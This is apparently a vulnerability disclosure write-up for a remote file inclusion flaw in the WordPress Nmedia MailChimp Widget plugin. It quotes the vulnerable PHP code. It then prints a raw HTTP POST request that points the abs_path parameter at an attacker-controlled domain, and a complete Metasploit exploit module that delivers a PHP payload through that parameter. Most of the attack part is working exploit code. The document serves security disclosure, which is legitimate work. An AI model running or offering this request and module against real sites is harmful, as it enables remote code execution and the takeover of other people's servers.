Advisory
Secunia Advisory SA 49538
Analysis
This vulnerability is nothing but a textbook arbitrary file inclusion vulnerability. The file is used to interacting with the mailchimp API. But the very first 2 lines of executable code in /api_mailchimp/postToMailChimp.php, it goes ahead and accepts a path for loading a file.
|
1 2 3 |
$path = $_POST['abs_path'] . 'wp-load.php'; //echo $path; die; require( $path ); |
By making following request, where the url has a file called ‘wp-load.php’ or otherwise will return php code, or using the proof of concept code, we can exploit this
|
1 2 3 4 5 6 7 |
POST /wordpress/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php HTTP/1.1 Host: 192.168.80.130 Content-Type: application/x-www-form-urlencoded Content-Length: 21 abs_path=http://myevildomain.com/ |
Proof of concept code
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 |
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::PHPInclude def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress Nmedia MailChimp Widget "abs_path" Remote File Inclusion Vulnerability', 'Description' => %q{ This module exploits a remote file include execution vulnerability in the WordPress Nmedia MailChimp Widget '/api_mailchimp/postToMailChimp.php' script. All versions of Nmedia MailChimp Widget up to and including 3.1 are vulnerable. }, 'Author' => [ 'Charlie Eriksen' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://secunia.com/advisories/49538/' ], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, # Arbitrary big number. The payload gets sent as an HTTP # response body, so really it's unlimited 'Space' => 262144, # 256k }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Jun 21 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('PHPURI', [ true , "The URI to request", '/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php']), ], self.class) end def php_exploit postdata = 'abs_path=' << php_include_url print_status("Sending exploit request...") response = send_request_raw({ 'global' => true, 'method' => 'POST', 'uri' => datastore['PHPURI'], 'data' => postdata, 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => postdata.length, } }) if response and response.code != 200 print_error("Got a non-200 response back. The server may not be vulnerable (#{response.code})") end handler end end |